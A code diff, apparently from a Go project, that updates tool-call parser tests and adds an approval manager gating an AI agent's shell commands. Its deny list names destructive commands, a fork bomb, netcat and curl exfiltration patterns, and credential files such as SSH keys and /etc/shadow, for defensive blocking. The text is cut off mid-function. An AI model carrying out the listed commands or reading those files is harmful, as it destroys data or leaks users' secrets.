||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -189,9 +212,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "New York",
|
"city": "New York",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -213,19 +236,19 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "London",
|
"city": "London",
|
||||||
"format": "fahrenheit",
|
"format": "fahrenheit",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 1,
|
Index: 1,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -240,19 +263,19 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "London",
|
"city": "London",
|
||||||
"format": "fahrenheit",
|
"format": "fahrenheit",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 1,
|
Index: 1,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -267,17 +290,17 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "say_hello",
|
Name: "say_hello",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 1,
|
Index: 1,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "London",
|
"city": "London",
|
||||||
"format": "fahrenheit",
|
"format": "fahrenheit",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -292,16 +315,16 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 1,
|
Index: 1,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -316,9 +339,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "Tokyo",
|
"city": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -347,9 +370,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "Tokyo",
|
"city": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -371,9 +394,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "Tokyo",
|
"city": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -453,18 +476,18 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_temperature",
|
Name: "get_temperature",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"city": "London",
|
"city": "London",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 1,
|
Index: 1,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -486,9 +509,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -528,9 +551,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -563,7 +586,7 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "say_hello_world",
|
Name: "say_hello_world",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -591,14 +614,14 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "say_hello_world",
|
Name: "say_hello_world",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 1,
|
Index: 1,
|
||||||
Name: "say_hello",
|
Name: "say_hello",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -624,14 +647,14 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "say_hello",
|
Name: "say_hello",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 1,
|
Index: 1,
|
||||||
Name: "say_hello_world",
|
Name: "say_hello_world",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -648,7 +671,7 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "say_hello",
|
Name: "say_hello",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -665,7 +688,7 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "say_hello_world",
|
Name: "say_hello_world",
|
||||||
Arguments: api.ToolCallFunctionArguments{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -687,9 +710,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_address",
|
Name: "get_address",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "London",
|
"location": "London",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -706,9 +729,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_address",
|
Name: "get_address",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "London",
|
"location": "London",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -725,10 +748,10 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "add",
|
Name: "add",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"a": "5",
|
"a": "5",
|
||||||
"b": "10",
|
"b": "10",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -756,7 +779,7 @@ func TestParser(t *testing.T) {
|
||||||
}
|
}
|
||||||
|
|
||||||
for i, want := range tt.calls {
|
for i, want := range tt.calls {
|
||||||
if diff := cmp.Diff(calls[i], want); diff != "" {
|
if diff := cmp.Diff(calls[i], want, argsComparer); diff != "" {
|
||||||
t.Errorf("Tool call %d mismatch (-got +want):\n%s", i, diff)
|
t.Errorf("Tool call %d mismatch (-got +want):\n%s", i, diff)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
@ -1316,7 +1339,7 @@ func TestFindArguments(t *testing.T) {
|
||||||
got, _ := findArguments(&api.Tool{Function: api.ToolFunction{Name: tt.tool}}, tt.buffer)
|
got, _ := findArguments(&api.Tool{Function: api.ToolFunction{Name: tt.tool}}, tt.buffer)
|
||||||
|
|
||||||
if diff := cmp.Diff(got, tt.want); diff != "" {
|
if diff := cmp.Diff(got, tt.want); diff != "" {
|
||||||
t.Errorf("scanArguments() args mismatch (-got +want):\n%s", diff)
|
t.Errorf("findArguments() args mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,953 @@
|
||||||
|
// Package agent provides agent loop orchestration and tool approval.
|
||||||
|
package agent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
"sync"
|
||||||
|
|
||||||
|
"golang.org/x/term"
|
||||||
|
)
|
||||||
|
|
||||||
|
// ApprovalDecision represents the user's decision for a tool execution.
|
||||||
|
type ApprovalDecision int
|
||||||
|
|
||||||
|
const (
|
||||||
|
// ApprovalDeny means the user denied execution.
|
||||||
|
ApprovalDeny ApprovalDecision = iota
|
||||||
|
// ApprovalOnce means execute this one time only.
|
||||||
|
ApprovalOnce
|
||||||
|
// ApprovalAlways means add to session allowlist.
|
||||||
|
ApprovalAlways
|
||||||
|
)
|
||||||
|
|
||||||
|
// ApprovalResult contains the decision and optional deny reason.
|
||||||
|
type ApprovalResult struct {
|
||||||
|
Decision ApprovalDecision
|
||||||
|
DenyReason string
|
||||||
|
}
|
||||||
|
|
||||||
|
// Option labels for the selector (numbered for quick selection)
|
||||||
|
var optionLabels = []string{
|
||||||
|
"1. Execute once",
|
||||||
|
"2. Always allow",
|
||||||
|
"3. Deny",
|
||||||
|
}
|
||||||
|
|
||||||
|
// autoAllowCommands are commands that are always allowed without prompting.
|
||||||
|
// These are zero-risk, read-only commands.
|
||||||
|
var autoAllowCommands = map[string]bool{
|
||||||
|
"pwd": true,
|
||||||
|
"echo": true,
|
||||||
|
"date": true,
|
||||||
|
"whoami": true,
|
||||||
|
"hostname": true,
|
||||||
|
"uname": true,
|
||||||
|
}
|
||||||
|
|
||||||
|
// autoAllowPrefixes are command prefixes that are always allowed.
|
||||||
|
// These are read-only or commonly-needed development commands.
|
||||||
|
var autoAllowPrefixes = []string{
|
||||||
|
// Git read-only
|
||||||
|
"git status", "git log", "git diff", "git branch", "git show",
|
||||||
|
"git remote -v", "git tag", "git stash list",
|
||||||
|
// Package managers - run scripts
|
||||||
|
"npm run", "npm test", "npm start",
|
||||||
|
"bun run", "bun test",
|
||||||
|
"uv run",
|
||||||
|
"yarn run", "yarn test",
|
||||||
|
"pnpm run", "pnpm test",
|
||||||
|
// Package info
|
||||||
|
"go list", "go version", "go env",
|
||||||
|
"npm list", "npm ls", "npm version",
|
||||||
|
"pip list", "pip show",
|
||||||
|
"cargo tree", "cargo version",
|
||||||
|
// Build commands
|
||||||
|
"go build", "go test", "go fmt", "go vet",
|
||||||
|
"make", "cmake",
|
||||||
|
"cargo build", "cargo test", "cargo check",
|
||||||
|
}
|
||||||
|
|
||||||
|
// denyPatterns are dangerous command patterns that are always blocked.
|
||||||
|
var denyPatterns = []string{
|
||||||
|
// Destructive commands
|
||||||
|
"rm -rf", "rm -fr",
|
||||||
|
"mkfs", "dd if=", "dd of=",
|
||||||
|
"shred",
|
||||||
|
"> /dev/", ">/dev/",
|
||||||
|
// Privilege escalation
|
||||||
|
"sudo ", "su ", "doas ",
|
||||||
|
"chmod 777", "chmod -R 777",
|
||||||
|
"chown ", "chgrp ",
|
||||||
|
// Network exfiltration
|
||||||
|
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
|
||||||
|
"wget --post",
|
||||||
|
"nc ", "netcat ",
|
||||||
|
"scp ", "rsync ",
|
||||||
|
// History and credentials
|
||||||
|
"history",
|
||||||
|
".bash_history", ".zsh_history",
|
||||||
|
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
|
||||||
|
".ssh/config",
|
||||||
|
".aws/credentials", ".aws/config",
|
||||||
|
".gnupg/",
|
||||||
|
"/etc/shadow", "/etc/passwd",
|
||||||
|
// Dangerous patterns
|
||||||
|
":(){ :|:& };:", // fork bomb
|
||||||
|
"chmod +s", // setuid
|
||||||
|
"mkfifo",
|
||||||
|
}
|
||||||
|
|
||||||
|
// denyPathPatterns are file patterns that should never be accessed.
|
||||||
|
// These are checked as exact filename matches or path suffixes.
|
||||||
|
var denyPathPatterns = []string{
|
||||||
|
".env",
|
||||||
|
".env.local",
|
||||||
|
".env.production",
|
||||||
|
"credentials.json",
|
||||||
|
"secrets.json",
|
||||||
|
"secrets.yaml",
|
||||||
|
"secrets.yml",
|
||||||
|
".pem",
|
||||||
|
".key",
|
||||||
|
}
|
||||||
|
|
||||||
|
// ApprovalManager manages tool execution approvals.
|
||||||
|
type ApprovalManager struct {
|
||||||
|
allowlist map[string]bool // exact matches
|
||||||
|
prefixes map[string]bool // prefix matches for bash commands (e.g., "cat:tools/")
|
||||||
|
mu sync.RWMutex
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewApprovalManager creates a new approval manager.
|
||||||
|
func NewApprovalManager() *ApprovalManager {
|
||||||
|
return &ApprovalManager{
|
||||||
|
allowlist: make(map[string]bool),
|
||||||
|
prefixes: make(map[string]bool),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// IsAutoAllowed checks if a bash command is auto-allowed (no prompt needed).
|
||||||
|
func IsAutoAllowed(command string) bool {
|
||||||
|
command = strings.TrimSpace(command)
|
||||||
|
|
||||||
|
// Check exact command match (first word)
|
||||||
|
fields := strings.Fields(command)
|
||||||
|
if len(fields) > 0 && autoAllowCommands[fields[0]] {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check prefix match
|
||||||
|
for _, prefix := range autoAllowPrefixes {
|
||||||
|
if strings.HasPrefix(command, prefix) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// IsDenied checks if a bash command matches deny patterns.
|
||||||
|
// Returns true and the matched pattern if denied.
|
||||||
|
func IsDenied(command string) (bool, string) {
|
||||||
|
commandLower := strings.ToLower(command)
|
||||||
|
|
||||||
|
// Check deny patterns
|
||||||
|
for _, pattern := range denyPatterns {
|
||||||
|
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||||
|
return true, pattern
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check deny path patterns
|
||||||
|
for _, pattern := range denyPathPatterns {
|
||||||
|
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||||
|
return true, pattern
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return false, ""
|
||||||
|
}
|
||||||
|
|
||||||
|
// FormatDeniedResult returns the tool result message when a command is blocked.
|
||||||
|
func FormatDeniedResult(command string, pattern string) string {
|
||||||
|
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
|
||||||
|
}
|
||||||
|
|
||||||
|
// extractBashPrefix extracts a prefix pattern from a bash command.
|
||||||
|
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
|
||||||
|
// For commands without path args, returns empty string.
|
||||||
|
func extractBashPrefix(command string) string {
|
||||||
|
// Split command by pipes and get the first part
|
||||||
|
parts := strings.Split(command, "|")
|
||||||
|
firstCmd := strings.TrimSpace(parts[0])
|
||||||
|
|
||||||
|
// Split into command and args
|
||||||
|
fields := strings.Fields(firstCmd)
|
||||||
|
if len(fields) < 2 {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
|
baseCmd := fields[0]
|
||||||
|
// Common commands that benefit from prefix allowlisting
|
||||||
|
// These are typically safe for read operations on specific directories
|
||||||
|
safeCommands := map[string]bool{
|
||||||
|
"cat": true, "ls": true, "head": true, "tail": true,
|
||||||
|
"less": true, "more": true, "file": true, "wc": true,
|
||||||
|
"grep": true, "find": true, "tree": true, "stat": true,
|
||||||
|
"sed": true,
|
||||||
|
}
|
||||||
|
|
||||||
|
if !safeCommands[baseCmd] {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
|
// Find the first path-like argument (must contain / or start with .)
|
||||||
|
// First pass: look for clear paths (containing / or starting with .)
|
||||||
|
for _, arg := range fields[1:] {
|
||||||
|
// Skip flags
|
||||||
|
if strings.HasPrefix(arg, "-") {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// Skip numeric arguments (e.g., "head -n 100")
|
||||||
|
if isNumeric(arg) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// Only process if it looks like a path (contains / or starts with .)
|
||||||
|
if !strings.Contains(arg, "/") && !strings.HasPrefix(arg, ".") {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// If arg ends with /, it's a directory - use it directly
|
||||||
|
if strings.HasSuffix(arg, "/") {
|
||||||
|
return fmt.Sprintf("%s:%s", baseCmd, arg)
|
||||||
|
}
|
||||||
|
// Get the directory part of a file path
|
||||||
|
dir := filepath.Dir(arg)
|
||||||
|
if dir == "." {
|
||||||
|
// Path is just a directory like "tools" or "src" (no trailing /)
|
||||||
|
return fmt.Sprintf("%s:%s/", baseCmd, arg)
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("%s:%s/", baseCmd, dir)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Second pass: if no clear path found, use the first non-flag argument as a filename
|
||||||
|
for _, arg := range fields[1:] {
|
||||||
|
if strings.HasPrefix(arg, "-") {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if isNumeric(arg) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// Treat as filename in current dir
|
||||||
|
return fmt.Sprintf("%s:./", baseCmd)
|
||||||
|
}
|
||||||
|
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
|
// isNumeric checks if a string is a numeric value
|
||||||
|
func isNumeric(s string) bool {
|
||||||
|
for _, c := range s {
|
||||||
|
if c < '0' || c > '9' {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return len(s) > 0
|
||||||
|
}
|
||||||
|
|
||||||
|
// isCommandOutsideCwd checks if a bash command targets paths outside the current working directory.
|
||||||
|
// Returns true if any path argument would access files outside cwd.
|
||||||
|
func isCommandOutsideCwd(command string) bool {
|
||||||
|
cwd, err := os.Getwd()
|
||||||
|
if err != nil {
|
||||||
|
return false // Can't determine, assume safe
|
||||||
|
}
|
||||||
|
|
||||||
|
// Split command by pipes and semicolons to check all parts
|
||||||
|
parts := strings.FieldsFunc(command, func(r rune) bool {
|
||||||
|
return r == '|' || r == ';' || r == '&'
|
||||||
|
})
|
||||||
|
|
||||||
|
for _, part := range parts {
|
||||||
|
part = strings.TrimSpace(part)
|
||||||
|
fields := strings.Fields(part)
|
||||||
|
if len(fields) == 0 {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check each argument that looks like a path
|
||||||
|
for _, arg := range fields[1:] {
|
||||||
|
// Skip flags
|
||||||
|
if strings.HasPrefix(arg, "-") {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Treat POSIX-style absolute paths as outside cwd on all platforms.
|
||||||
|
if strings.HasPrefix(arg, "/") || strings.HasPrefix(arg, "\\") {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for absolute paths outside cwd
|
||||||
|
if filepath.IsAbs(arg) {
|
||||||
|
absPath := filepath.Clean(arg)
|
||||||
|
if !strings.HasPrefix(absPath, cwd) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for relative paths that escape cwd (e.g., ../foo, /etc/passwd)
|
||||||
|
if strings.HasPrefix(arg, "..") {
|
||||||
|
// Resolve the path relative to cwd
|
||||||
|
absPath := filepath.Join(cwd, arg)
|
||||||
|
absPath = filepath.Clean(absPath)
|
||||||
|
if !strings.HasPrefix(absPath, cwd) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for home directory expansion
|
||||||
|
if strings.HasPrefix(arg, "~") {
|
||||||
|
home, err := os.UserHomeDir()
|
||||||
|
if err == nil && !strings.HasPrefix(home, cwd) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// AllowlistKey generates the key for exact allowlist lookup.
|
||||||
|
func AllowlistKey(toolName string, args map[string]any) string {
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
return fmt.Sprintf("bash:%s", cmd)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return toolName
|
||||||
|
}
|
||||||
|
|
||||||
|
// IsAllowed checks if a tool/command is allowed (exact match or prefix match).
|
||||||
|
func (a *ApprovalManager) IsAllowed(toolName string, args map[string]any) bool {
|
||||||
|
a.mu.RLock()
|
||||||
|
defer a.mu.RUnlock()
|
||||||
|
|
||||||
|
// Check exact match first
|
||||||
|
key := AllowlistKey(toolName, args)
|
||||||
|
if a.allowlist[key] {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// For bash commands, check prefix matches
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
prefix := extractBashPrefix(cmd)
|
||||||
|
if prefix != "" && a.prefixes[prefix] {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check if tool itself is allowed (non-bash)
|
||||||
|
if toolName != "bash" && a.allowlist[toolName] {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// AddToAllowlist adds a tool/command to the session allowlist.
|
||||||
|
// For bash commands, it adds the prefix pattern instead of exact command.
|
||||||
|
func (a *ApprovalManager) AddToAllowlist(toolName string, args map[string]any) {
|
||||||
|
a.mu.Lock()
|
||||||
|
defer a.mu.Unlock()
|
||||||
|
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
prefix := extractBashPrefix(cmd)
|
||||||
|
if prefix != "" {
|
||||||
|
a.prefixes[prefix] = true
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Fall back to exact match if no prefix extracted
|
||||||
|
a.allowlist[fmt.Sprintf("bash:%s", cmd)] = true
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
a.allowlist[toolName] = true
|
||||||
|
}
|
||||||
|
|
||||||
|
// RequestApproval prompts the user for approval to execute a tool.
|
||||||
|
// Returns the decision and optional deny reason.
|
||||||
|
func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any) (ApprovalResult, error) {
|
||||||
|
// Format tool info for display
|
||||||
|
toolDisplay := formatToolDisplay(toolName, args)
|
||||||
|
|
||||||
|
// Enter raw mode for interactive selection
|
||||||
|
fd := int(os.Stdin.Fd())
|
||||||
|
oldState, err := term.MakeRaw(fd)
|
||||||
|
if err != nil {
|
||||||
|
// Fallback to simple input if terminal control fails
|
||||||
|
return a.fallbackApproval(toolDisplay)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Flush any pending stdin input before starting selector
|
||||||
|
// This prevents buffered input from causing double-press issues
|
||||||
|
flushStdin(fd)
|
||||||
|
|
||||||
|
// Check if bash command targets paths outside cwd
|
||||||
|
isWarning := false
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
isWarning = isCommandOutsideCwd(cmd)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Run interactive selector
|
||||||
|
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning)
|
||||||
|
if err != nil {
|
||||||
|
term.Restore(fd, oldState)
|
||||||
|
return ApprovalResult{Decision: ApprovalDeny}, err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Restore terminal
|
||||||
|
term.Restore(fd, oldState)
|
||||||
|
|
||||||
|
// Map selection to decision
|
||||||
|
switch selected {
|
||||||
|
case -1: // Ctrl+C cancelled
|
||||||
|
return ApprovalResult{Decision: ApprovalDeny, DenyReason: "cancelled"}, nil
|
||||||
|
case 0:
|
||||||
|
return ApprovalResult{Decision: ApprovalOnce}, nil
|
||||||
|
case 1:
|
||||||
|
